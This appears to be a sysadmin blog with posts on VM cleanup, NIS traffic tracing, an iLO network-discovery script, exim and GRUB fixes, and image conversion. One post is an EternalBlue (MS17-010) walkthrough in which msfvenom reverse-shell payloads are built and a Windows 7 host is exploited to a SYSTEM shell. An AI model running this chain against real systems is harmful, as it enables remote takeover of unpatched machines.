Monday, November 25, 2019

clean up virtualbox failed / purged vms

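#!/bin/bash
# Purge VirtualBox VM directories that VirtualBox no longer knows about
# (leftovers of failed or already-purged VMs), record disk usage before and
# after, and mail the report.
#
# Destructive: every entry under $virtualboxvmsdir whose name is not a
# registered VM is removed. Comment out the rm line for a dry run first.
work=/home/uid/tmp
validvms=/home/uid/tmp/validvms
workclean=/home/uid/tmp/cleanvms
virtualboxvmsdir="/home/uid/VirtualBox VMs"
box=$(hostname)
purgedate=$(date +"%m-%d-%Y")

# clean up old work directories
# ${work:?} aborts instead of expanding to "rm -rf /" if the variable is ever empty
rm -rf -- "${work:?}"
mkdir -p -- "$work" || exit 1

# find all vbox vms - not just running - and strip the output down to
# the bare VM names (the quoted field of 'vboxmanage list vms')
vboxmanage list vms > "$validvms"
cut -d '"' -f2 < "$validvms" > "$workclean"

# an empty VM list (vboxmanage missing from cron's PATH, wrong user, ...)
# would classify every directory as stale and delete all of them - refuse
if [ ! -s "$workclean" ]; then
    echo "no registered vms found, refusing to purge" >&2
    exit 1
fi

# change directory into where vbox vms reside; the rm loop below deletes
# everything in the *current* directory that is not a VM, so a failed cd
# must stop the script rather than let it run somewhere else
cd -- "$virtualboxvmsdir" || { echo "cannot find virtualbox dir exiting" >&2; exit 1; }

{
    echo "$purgedate"
    echo ".........................."
    echo "start"
    du -hsc
} >> "$work/purgedvms-use"

# every entry of the VM directory is looked up in the valid-VM list
# (exact whole-line fixed-string match); anything not found is deleted
# and its name is captured in a file for the report
touch "$work/purgedvms"
for i in *; do
    # an empty directory leaves the literal '*' in $i - skip it
    [ -e "$i" ] || continue
    if ! grep -qxF -- "$i" "$workclean"; then
        echo "Deleting: $i"
        printf '%s\n' "$i" >> "$work/purgedvms"
        # comment out the next line for a dry run, then re-enable it to remove the files
        rm -rf -- "$i"
    fi
done

{
    echo "finish"
    du -hsc
    echo ".........................."
} >> "$work/purgedvms-use"
sed -i '/total/d' "$work/purgedvms-use"

# here we email the results

cat "$work/purgedvms-use" "$work/purgedvms" > "$work/purgedvms-union"
mail -s "$box purged $purgedate" me@inhell < "$work/purgedvms-union"

exit 0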

Thursday, November 21, 2019

Friday, November 15, 2019

who is accessing my nis server?

 
 first, figure out the ports the nis daemon (ypserv) is listening on. ypserv registers with the portmapper and is handed its ports at start-up, so they are not fixed — re-run this after any restart of ypserv:  
   
 # rpcinfo -p|grep ypserv  
   100004  2  udp  951 ypserv  
   100004  1  udp  951 ypserv  
   100004  2  tcp  954 ypserv  
   100004  1  tcp  954 ypserv  
   
 gather up all the clients talking to the daemon:  
   
 # tcpdump -nn port 951 or port 954      (run on the NIS server itself; -nn = no host or port name lookups, the same as "-n -n")  
   
 the output will look like this:  
   
 10:55:35.482333 IP 6.6.6.6.951 > 9.9.9.107.729: UDP, length 28  
 10:55:38.099478 IP 9.9.9.173.1013 > 6.6.6.6.951: UDP, length 64  
 10:55:38.099631 IP 6.6.6.6.951 > 9.9.9.173.1013: UDP, length 28  
 10:55:55.483328 IP 9.9.9.107.730 > 6.6.6.6.951: UDP, length 64  
 10:55:55.483491 IP 6.6.6.6.951 > 9.9.9.107.730: UDP, length 28  
 10:56:15.484442 IP 9.9.9.107.731 > 6.6.6.6.951: UDP, length 64  
 10:56:15.484747 IP 6.6.6.6.951 > 9.9.9.107.731: UDP, length 28  
 10:56:18.443343 IP 9.9.9.173.50256 > 6.6.6.6.951: UDP, length 140  
 10:56:18.443468 IP 6.6.6.6.951 > 9.9.9.173.50256: UDP, length 28  
 10:56:35.485748 IP 9.9.9.107.732 > 6.6.6.6.951: UDP, length 64  
 10:56:35.485920 IP 6.6.6.6.951 > 9.9.9.107.732: UDP, length 28  
   
 the ip address with 951 or 954 is the nis server.  
   
 in this case, our clients are 9.9.9.107 & 9.9.9.173.  
 a client only shows up while it is actually querying the server, so a short capture can miss hosts that bind to NIS less often — let it run for a while, or use -w to save the capture and review it later.  
   
 what to do if you don't have tcpdump? go straight to the source!  
 this nis server is older than dirt, but there are old versions  
 of tcpdump and libpcap that are still compatible with its kernel...  
   
 wget http://www.tcpdump.org/release/tcpdump-3.9.5.tar.gz  
 wget http://www.tcpdump.org/release/libpcap-0.9.6.tar.gz  
   
 these tarballs arrive over plain http, and you are about to build and run them as root on the NIS server:  
 fetch the matching .sig files from tcpdump.org and verify them against the project's signing key first.  
 they are also very old releases, so treat this as a one-off tool and remove it again when you are done.  
   
 tar xvfz and away you go.  

Friday, October 4, 2019

find ilo

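 #!/bin/bash  
 #  
 # findilos - Search a local network segment for iLOs  
 #      The iLO is the Integrated Lights-Out management processor  
 #      used on HP ProLiant and BladeSystem servers  
 #  
 scriptversion="1.0"  
 #  
 # Author: iggy@nachotech.com  
 #  
 # Website: http://blog.nachotech.com  
 #  
 # Requires: tr sed expr curl nmap  
 #  
 # Tested with: Nmap 4.20, curl 7.17.1, RHEL4  
 #  
 # Note: Discovery of an iLO is dependent upon the Virtual Media port  
 #    being set to the default of 17988. If this has been changed  
 #    by the iLO administrator, then this script will NOT find it.  
 #  
 #    Also, if the iLO XML Reply Data Return has been Disabled by  
 #    the iLO administrator, this script will not be able to  
 #    gather any information about the server. It will still be  
 #    discovered, but all you will see is its IP address.  
 #  
   
 # GLOBAL VARIABLES  
   
 scriptname="findilos"  
 # Scratch files. They are created with mktemp rather than named
 # /tmp/<name>.$$: the script normally runs as root (nmap -sS needs it) and a
 # guessable name in a world-writable /tmp is a classic symlink target.
 # The EXIT trap removes them on every exit path, including the usage error.
 iloips=$(mktemp /tmp/tmpilos.XXXXXX) || exit 255  
 iloxml=$(mktemp /tmp/tmpiloxml.XXXXXX) || exit 255  
 ilohwvers=$(mktemp /tmp/tmpilohwvers.XXXXXX) || exit 255  
 trap 'rm -f -- "$iloips" "$iloxml" "$ilohwvers"' EXIT  
   
 # running count of iLOs printed; integer attribute so "+1" assignments work  
 declare -i ilosfound=0  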
   
 # FUNCTIONS  
   
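 function parseiloxml {  
  # Extract the text of XML element <$1> from the file named by the global
  # $iloxml into the global parsedstring, or "N/A" when the element is absent.
  # Only the flat "<TAG>value</TAG>" layout that iLO returns is handled: all
  # non-printable characters (including newlines) are stripped first so the
  # sed patterns operate on one long line.
  local tag=$1  
  local tempstring  
  # Look for the opening tag itself, not the bare name: a search for "PN"
  # also matches "<SPN>", and the function would then return the text that
  # precedes that element instead of N/A.
  if ! grep -qF -- "<$tag>" "$iloxml" 2>/dev/null; then  
   parsedstring="N/A"  
   return 0  
  fi  
  tempstring=$(tr -d -c '[:print:]' < "$iloxml" | sed "s/^.*<$tag>//" | sed "s|</$tag>.*||")  
  # Trim leading and trailing whitespace with parameter expansion. The former
  # expr regex used [ \t]; inside a bracket expression that is a literal
  # backslash and 't', so any value ending in 't' lost its last character.
  tempstring="${tempstring#"${tempstring%%[![:space:]]*}"}"  
  tempstring="${tempstring%"${tempstring##*[![:space:]]}"}"  
  parsedstring=$tempstring  
 }  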
   
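 function is_installed {  
  # Exit with status 255 unless "$1" resolves to a runnable command.
  # command -v is the portable check; 'which' is an external program that is
  # itself sometimes missing and whose exit status differs between
  # implementations. The diagnostic goes to stderr so it never pollutes the
  # table written to stdout.
  if ! command -v -- "$1" > /dev/null 2>&1; then  
   printf "\nERROR: %s not installed.\n\n" "$1" >&2  
   exit 255  
  fi  
 }  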
   
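 # MAIN  
 # check for tools that we depend upon  
   
 is_installed tr  
 is_installed sed  
 is_installed expr  
 is_installed curl  
 is_installed nmap  
   
 # check syntax - should have 1 and only 1 parameter on cmdline  
   
 if [ $# -ne 1 ]; then  
  printf "%s %s ( http://blog.nachotech.com/ )\n" "$scriptname" "$scriptversion"  
  printf "Usage: %s {target network specification}\n" "$scriptname"  
  printf "TARGET NETWORK SPECIFICATION:\n"  
  printf " Can pass hostnames, IP addresses, networks, etc.\n"  
  printf " Ex: server1.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"  
  printf "EXAMPLE:\n"  
  printf " %s 16.32.64.0/22\n" "$scriptname"  
  exit 255  
 fi  
   
 iprange=$1  
   
 # prepare lookup file for iLO hardware versions: the HWRI string reported
 # by the iLO is matched as a substring against these lines, and the first
 # word of the matching line is the generation printed in the table  
   
 printf '%s\n' \
  'iLO-1 shows hw version ASIC: 2' \
  'iLO-2 shows hw version ASIC: 7' \
  'i-iLO shows hw version T0' > "$ilohwvers"  
   
 #  
 # scan a range of IP addresses looking for an  
 # open tcp port 17988 (the iLO virtual media port).  
 # -sS needs root; -P0 (skip host discovery) is the old spelling of -Pn,  
 # kept because the script was tested against Nmap 4.20.  
 #  
   
 printf "Scanning..."  
   
 nmap -n -P0 -sS -p 17988 -oG - "$iprange" | grep -F /open/ | awk '{print $2}' > "$iloips"  
   
 printf "\n\n"  
   
 echo "--------------- ------ -------- ------------ -------------------------"  
 echo "iLO IP Address iLO HW iLO FW  Server S/N  Server Model"  
 echo "--------------- ------ -------- ------------ -------------------------"  
   
 #  
 # read the list of IP addresses one at a time on fd 3, so that nothing
 # run inside the loop can consume the remaining addresses from stdin  
 #  
   
 while IFS= read -r iloip <&3; do  
  [ -n "$iloip" ] || continue  
  ilosfound=$((ilosfound + 1))  
  #  
  # attempt to read the xmldata from iLO, no password required.  
  # The query string has to be part of the URL: an unquoted "item=All"  
  # after a space is treated by curl as a second URL, not as a parameter.  
  #  
  curl --proxy "" --fail --silent --max-time 3 "http://$iloip/xmldata?item=All" > "$iloxml"  
   
  #  
  # parse the server model (SPN), serial number (SBSN), iLO product name (PN),  
  # firmware (FWRI) and hardware (HWRI) strings out of the XML output  
  #  
   
  parseiloxml SPN; servermodel=$parsedstring  
  parseiloxml SBSN; sernum=$parsedstring  
  parseiloxml PN;  ilotype=$parsedstring  
  parseiloxml FWRI; ilofirmware=$parsedstring  
  parseiloxml HWRI; ilohardware=$parsedstring  
   
  # map the hardware string to a generation. An empty pattern matches every  
  # line of the lookup file, so only search when there is something to match.  
  ilohwver=""  
  if [ -n "$ilohardware" ]; then  
   ilohwver=$(grep -F -- "$ilohardware" "$ilohwvers" | awk '{print $1}')  
  fi  
  [ -n "$ilohwver" ] || ilohwver="N/A"  
  [ -n "$sernum" ] || sernum="N/A"  
   
  printf "%-15s %-6s %-8s %-12s %s\n" "$iloip" "$ilohwver" "$ilofirmware" "$sernum" "$servermodel"  
   
 done 3< "$iloips"  
   
 printf "\n%d iLOs found on network target %s.\n\n" "$ilosfound" "$iprange"  
   
 rm -f -- "$iloips" "$iloxml" "$ilohwvers"  
   
 exit 0  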

Friday, August 16, 2019

autoblue is better than msfconsole sometimes

(one thing to notice in the transcript below: shell_prep generated a stageless x86 payload, windows/shell_reverse_tcp, but listener_prep set the x86 handler to the staged windows/shell/reverse_tcp. The handler therefore pushes a stage down the new connection, and the garbage line plus "The system cannot find the file specified" right after "sessions -i 1" look like cmd.exe trying to run that stage as a command. It still works here, but set the handler's PAYLOAD to exactly what msfvenom built.)

 root@kali# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git        
 Cloning into 'AutoBlue-MS17-010'...                         
 remote: Enumerating objects: 1, done.                                     
 remote: Counting objects: 100% (1/1), done.                        
 remote: Total 72 (delta 0), reused 0 (delta 0), pack-reused 71  
 Unpacking objects: 100% (72/72), done.  
   
 root@kali# ./shell_prep.sh           
          _.-;;-._                            
      '-..-'|  ||  |                            
      '-..-'|_.-;;-._|                            
      '-..-'|  ||  |                              
      '-..-'|_.-''-._|                            
 Eternal Blue Windows Shellcode Compiler                     
                                          
 Let's compile them windoos shellcodezzz                     
                                          
 Compiling x64 kernel shellcode                                     
 Compiling x86 kernel shellcode                            
 kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)  
 Y                             
 LHOST for reverse connection:                       
 10.254.1.47                          
 LPORT you want x64 to listen on:                
 443  
 LPORT you want x86 to listen on:  
 445  
 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell  
 1                          
 Type 0 to generate a staged payload or 1 to generate a stageless payload  
 1                      
 Generating x64 cmd shell (stageless)...    
   
 msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=443  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x64 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 460 bytes  
 Saved as: sc_x64_msf.bin  
   
 Generating x86 cmd shell (stageless)...  
   
 msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=445  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x86 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 324 bytes  
 Saved as: sc_x86_msf.bin  
   
 MERGING SHELLCODE WOOOO!!!  
 DONE  
   
 root@kali# ./listener_prep.sh  
  __  
  /,-  
  ||)  
  \\_, )  
   `--'  
 Enternal Blue Metasploit Listener  
   
 LHOST for reverse connection:  
 10.254.1.47  
 LPORT for x64 reverse connection:  
 443  
 LPORT for x86 reverse connection:  
 445  
 Enter 0 for meterpreter shell or 1 for regular cmd shell:  
 1  
 Type 0 if this is a staged payload or 1 if it is for a stageless payload  
 1  
 Starting listener (stageless)...  
 [ ok ] Starting postgresql (via systemctl): postgresql.service.  
   
   
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
 MMMMMMMMMMM        MMMMMMMMMM  
 MMMN$              vMMMM  
 MMMNl MMMMM       MMMMM JMMMM  
 MMMNl MMMMMMMN    NMMMMMMM JMMMM  
 MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMNM  MMMMMMM  MMMMM jMMMM  
 MMMNI WMMMM  MMMMMMM  MMMM# JMMMM  
 MMMMR ?MMNM       MMMMM .dMMMM  
 MMMMNm `?MMM       MMMM` dMMMMM  
 MMMMMMN ?MM       MM? NMMMMMN  
 MMMMMMMMNe         JMMMMMNMMM  
 MMMMMMMMMMNm,      eMMMMMNMMNMM  
 MMMMNNMNMMMMMNx    MMMMMMNMMNMMNM  
 MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM  
     https://metasploit.com  
   
   
     =[ metasploit v5.0.6-dev              ]  
 + -- --=[ 1857 exploits - 1055 auxiliary - 327 post    ]  
 + -- --=[ 546 payloads - 44 encoders - 10 nops      ]  
 + -- --=[ 2 evasion                    ]  
   
 [*] Processing config.rc for ERB directives.  
 resource (config.rc)> use exploit/multi/handler  
 resource (config.rc)> set PAYLOAD windows/x64/shell_reverse_tcp  
 PAYLOAD => windows/x64/shell_reverse_tcp  
 resource (config.rc)> set LHOST 10.254.1.47  
 LHOST => 10.254.1.47  
 resource (config.rc)> set LPORT 443  
 LPORT => 443  
 resource (config.rc)> set ExitOnSession false  
 ExitOnSession => false  
 resource (config.rc)> set EXITFUNC thread  
 EXITFUNC => thread  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 0.  
 [*] Exploit completed, but no session was created.  
 resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp  
 [*] Started reverse TCP handler on 10.254.1.47:443  
 PAYLOAD => windows/shell/reverse_tcp  
 resource (config.rc)> set LPORT 445  
 LPORT => 445  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 1.  
 [*] Exploit completed, but no session was created.  
 [*] Starting persistent handler(s)...  
   
 [*] Started reverse TCP handler on 10.254.1.47:445  
 msf5 exploit(multi/handler) >   
   
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
   
 [*] Encoded stage with x86/shikata_ga_nai  
 [*] Sending encoded stage (267 bytes) to 10.1.1.13  
 [*] Command shell session 1 opened (10.254.1.47:445 -> 10.1.1.13:49173) at 2019-02-21 13:28:21 -0500  
   
 msf5 exploit(multi/handler) > sessions  
   
 Active sessions  
 ===============  
   
  Id Name Type        Information                                    Connection  
  -- ---- ----        -----------                                    ----------  
  1     shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.254.1.47:445 -> 10.1.1.13:49173 (10.1.1.13)  
   
 msf5 exploit(multi/handler) > sessions -i 1  
 [*] Starting interaction with 1...  
   
 More?  
 SR<@p  f%_?Mg??:6Zdx8}}(ks-cx_JwD`c@MWH?l hp6  
 The system cannot find the file specified.  
   
 C:\Windows\system32>whoami  
 whoami  
 nt authority\system  

making an imitator like an original in ubuntu

p2v isn't your friend, and really you just want what you had before without all the junk. you already back up /etc — smart you.
how about figuring out what packages you have and installing them on your clone:

original # dpkg --get-selections  > pkglist
original # scp pkglist notme@imitator:/tmp

imitator # apt-get update          (so every package in pkglist is known to apt; otherwise --set-selections warns "not in database" and skips it)
imitator # dpkg --set-selections < pkglist
imitator # apt-get dselect-upgrade

exim4 retry time not reached for any host

 The relay is having a bad day. Then it comes back online.  
 But /var/log/exim4/mainlog keeps spitting out:  
   
 "Exim error – retry time not reached for any host"  
   
 Okay — exim is still honouring the retry back-off it recorded while the relay was down. Clearing the hints databases makes it try again now:  
   
 # cd /var/spool/exim4/db  
 # rm -f retry retry.lockfile  
 # rm -f wait-remote_smtp wait-remote_smtp.lockfile  
 # service exim4 restart      (on Debian/Ubuntu the service is named exim4, matching the /var/spool/exim4 path above; use "exim" only if that is what your init actually calls it)  

Monday, March 18, 2019

fix vmware converter disk fubar with kali

 I decided to used VMWare Converter to convert a live Kali system to a VMWare VM. No joy.  
   
 My environment:  
   
 [system-to-convert]  
 # uname -a  
 # Linux kali2 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux  
 # less /etc/lsb-release  
   
  DISTRIB_ID=Kali  
  DISTRIB_RELEASE=kali-rolling  
  DISTRIB_CODENAME=kali-rolling  
  DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"  
   
 [vmware vcenter converter standalone]  
 rev 6.2.0 build-8466193   
   
   
 After running a couple of conversions, I consistently got a failure at 97% of the process completed, 
 with this error:  
   
  FAILED: An error occurred during the conversion: 'GrubInstaller::InstallGrub:   
  /usr/lib/vmware-converter/installGrub.sh failed with return code: 127, and message:   
  FATAL: kernel too old Error running vmware-updateGrub.sh through chroot into /mnt/p2v-src-root Command:  
  chroot "/mnt/p2v-src-root" /vmware-updateGrub.sh "GRUB2" "(hd0)" "(hd0,1)" /vmware-device.map 
  "grub2-install" '  
   
   
 This means the grub2-install step of the conversion was failing.   
 The Kali system keeps its root and swap on LVM logical volumes rather than   
 a simpler /dev/sda1 &c. layout, and the converter's grub helper does not cope with that.  
   
 To repair the process I booted off of a Kali LiveCD (really any modern Ubuntu ISO would've 
 done the trick, too):  
   
 # apt-get install lvm2  
 # vgchange -a y  
 # lvscan  
   
  ACTIVE      '/dev/kali2-vg/root' [510.64 GiB] inherit  
  ACTIVE      '/dev/kali2-vg/swap_1' [47.99 GiB] inherit  
    
 # mount /dev/kali2-vg/root /mnt  
   
 # cat /mnt/etc/fstab  
   
  # /boot was on /dev/sda1 during installation  
  /dev/sda1 /boot      ext2  defaults    0    2  
  #UUID=c7c0cf46-3c64-4ceb-92d8-69d3906ab399 /boot      ext2  defaults    0    2  
   
  /dev/mapper/kali2--vg-root /        ext4  errors=remount-ro 0    1  
  /dev/mapper/kali2--vg-swap_1 none      swap  sw       0    0  
  /dev/sr0    /media/cdrom0  udf,iso9660 user,noauto   0    0  
   
 # mount /dev/sda1 /mnt/boot      (the fstab above shows /dev/sda1 is /boot)  
 # mount --bind /dev /mnt/dev  
 # mount --bind /proc /mnt/proc  
 # mount --bind /sys /mnt/sys  
 # chroot /mnt      (apt-get inside the chroot needs name resolution; if /mnt/etc/resolv.conf is missing, copy the live system's in first)  
   
 # apt-get remove --purge grub-pc grub-common  
 # apt-get install grub-pc  
 # grub-mkconfig      (without -o this only prints the generated config; update-grub below is what writes it)  
 # update-grub  
 # grub-install /dev/sda  
   
 # exit  
 # umount /mnt/sys  
 # sudo umount /mnt/dev  
 # sudo umount /mnt/proc  
 # sudo umount /mnt/boot  
 # sudo umount /mnt  

Wednesday, February 13, 2019

convert image format on macosx

tiff to jpg

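# tiff -> jpg with sips (macOS). The -e test skips the literal "*.tiff" that
# bash passes through when nothing matches, so sips is never run on a
# nonexistent file.
for i in *.tiff; do
  [ -e "$i" ] || continue
  sips -s format jpeg "$i" --out "${i%.*}.jpg"
done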
pdf to jpg
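# pdf -> jpg with sips (macOS); skip the literal "*.pdf" left behind when
# nothing matches.
# NOTE(review): sips appears to rasterise only the first page of a multi-page
# PDF — confirm that is what you want before batch-converting.
for i in *.pdf; do
  [ -e "$i" ] || continue
  sips -s format jpeg "$i" --out "${i%.*}.jpg"
done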